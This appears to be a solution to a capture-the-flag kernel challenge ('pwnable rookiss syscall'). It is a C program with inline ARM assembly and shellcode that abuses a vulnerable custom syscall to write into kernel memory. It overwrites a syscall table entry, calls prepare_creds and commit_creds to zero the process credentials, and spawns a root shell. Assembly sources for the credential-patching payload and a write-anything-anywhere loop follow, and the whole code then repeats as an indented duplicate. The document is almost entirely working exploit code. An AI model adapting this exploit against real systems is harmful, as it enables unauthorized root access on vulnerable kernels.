cubarco/1-pwnable-rookiss-syscall.c

## 1-pwnable-rookiss-syscall.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";

char addr1[] = "\xfe\xca\xf5\x83";
char addr2[] = "\xee\xbe\xf6\x83";

int ret;

int main()
{
    asm volatile (
        "mov r0, %1\n"
        "mov r1, %2\n"
        "mov r7, #223\n"
        "svc #0\n"
        "mov r0, %3\n"
        "mov r1, %4\n"
        "mov r7, #223\n"
        "svc #0\n"
        "mov %0, r0"
        : "=r" (ret)
        : "r" (waa), "r" (0x83f5cafe),
          "r" (addr1), "r" (0x8000e6c4)
        : "r0", "r1", "r2", "r3", "lr"
    );
    printf("return value: %x\n", ret);

    asm volatile (
        "mov r0, %1\n"
        "mov r1, %2\n"
        "mov r2, %3\n"
        "mov r7, #223\n"
        "svc #0\n"
        "mov r0, %4\n"
        "mov r1, %5\n"
        "mov r2, %6\n"
        "mov r7, #223\n"
        "svc #0\n"
        "mov %0, r0"
        : "=r" (ret)
        : "r" (cred), "r" (0x83f6beee), "r" (89),
          "r" (addr2), "r" (0x8000e6c4), "r" (5),
          "r" (0)
        : "r0", "r1", "r2", "r3", "r5", "lr"
    );
    printf("return value: %x\n", ret);

    asm volatile (
        "mov r7, #223\n"
        "svc #0\n"
        "mov %0, r0"
        : "=r" (ret)
        :
        : "r0", "r1", "r3", "lr"
    );

    execl("/bin/sh", "sh", NULL);
    return 0;
}

## cred.s
@ prepare_creds and commit_creds
.section .text
.global _start
_start:
    push {lr}

    mov r0, #0
    ldr r3, =0x8003f44c  @ prepare_creds()
    blx r3

    push {r0}
    sub r1, r1, r1
    add r0, #4
    str r1, [r0], #4  @ set uid, euid, gid, etc
    str r1, [r0], #4
    str r1, [r0], #4
    str r1, [r0], #4
    str r1, [r0], #4
    str r1, [r0], #4
    str r1, [r0], #4
    str r1, [r0], #4

    pop {r0}
    ldr r3, =0x8003f56c  @ commit_creds(r0)
    blx r3

    pop {lr}
    bx lr

## waa.s
@ Write anything anywhere

.section .text
.global _start
_start:

lp:
    ldrb r3, [r0], #1
    strb r3, [r1], #1
    subs r2, r2, #1
    bge lp

    bx lr
	#include <stdio.h>
	#include <stdlib.h>
	#include <string.h>
	#include <unistd.h>

	char cred[] = "\x04\xe0\x2d\xe5\x00\x00\xa0\xe3\x40\x30\x9f\xe5\x33\xff\x2f\xe1\x04\x00\x2d\xe5\x01\x10\x41\xe0\x04\x00\x80\xe2\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x10\x80\xe4\x04\x00\x9d\xe4\x0c\x30\x9f\xe5\x33\xff\x2f\xe1\x04\xe0\x9d\xe4\x1e\xff\x2f\xe1\x4c\xf4\x03\x80\x6c\xf5\x03\x80";
	char waa[] = "\x01\x30\xd0\xe4\x01\x30\xc1\xe4\x01\x20\x52\xe2\xfb\xff\xff\xaa\x1e\xff\x2f\xe1";

	char addr1[] = "\xfe\xca\xf5\x83";
	char addr2[] = "\xee\xbe\xf6\x83";

	int ret;

	int main()
	{
	asm volatile (
	"mov r0, %1\n"
	"mov r1, %2\n"
	"mov r7, #223\n"
	"svc #0\n"
	"mov r0, %3\n"
	"mov r1, %4\n"
	"mov r7, #223\n"
	"svc #0\n"
	"mov %0, r0"
	: "=r" (ret)
	: "r" (waa), "r" (0x83f5cafe),
	"r" (addr1), "r" (0x8000e6c4)
	: "r0", "r1", "r2", "r3", "lr"
	);
	printf("return value: %x\n", ret);

	asm volatile (
	"mov r0, %1\n"
	"mov r1, %2\n"
	"mov r2, %3\n"
	"mov r7, #223\n"
	"svc #0\n"
	"mov r0, %4\n"
	"mov r1, %5\n"
	"mov r2, %6\n"
	"mov r7, #223\n"
	"svc #0\n"
	"mov %0, r0"
	: "=r" (ret)
	: "r" (cred), "r" (0x83f6beee), "r" (89),
	"r" (addr2), "r" (0x8000e6c4), "r" (5),
	"r" (0)
	: "r0", "r1", "r2", "r3", "r5", "lr"
	);
	printf("return value: %x\n", ret);

	asm volatile (
	"mov r7, #223\n"
	"svc #0\n"
	"mov %0, r0"
	: "=r" (ret)
	:
	: "r0", "r1", "r3", "lr"
	);

	execl("/bin/sh", "sh", NULL);
	return 0;
	}
	@ prepare_creds and commit_creds
	.section .text
	.global _start
	_start:
	push {lr}

	mov r0, #0
	ldr r3, =0x8003f44c @ prepare_creds()
	blx r3

	push {r0}
	sub r1, r1, r1
	add r0, #4
	str r1, [r0], #4 @ set uid, euid, gid, etc
	str r1, [r0], #4
	str r1, [r0], #4
	str r1, [r0], #4
	str r1, [r0], #4
	str r1, [r0], #4
	str r1, [r0], #4
	str r1, [r0], #4

	pop {r0}
	ldr r3, =0x8003f56c @ commit_creds(r0)
	blx r3

	pop {lr}
	bx lr
	@ Write anything anywhere

	.section .text
	.global _start
	_start:

	lp:
	ldrb r3, [r0], #1
	strb r3, [r1], #1
	subs r2, r2, #1
	bge lp

	bx lr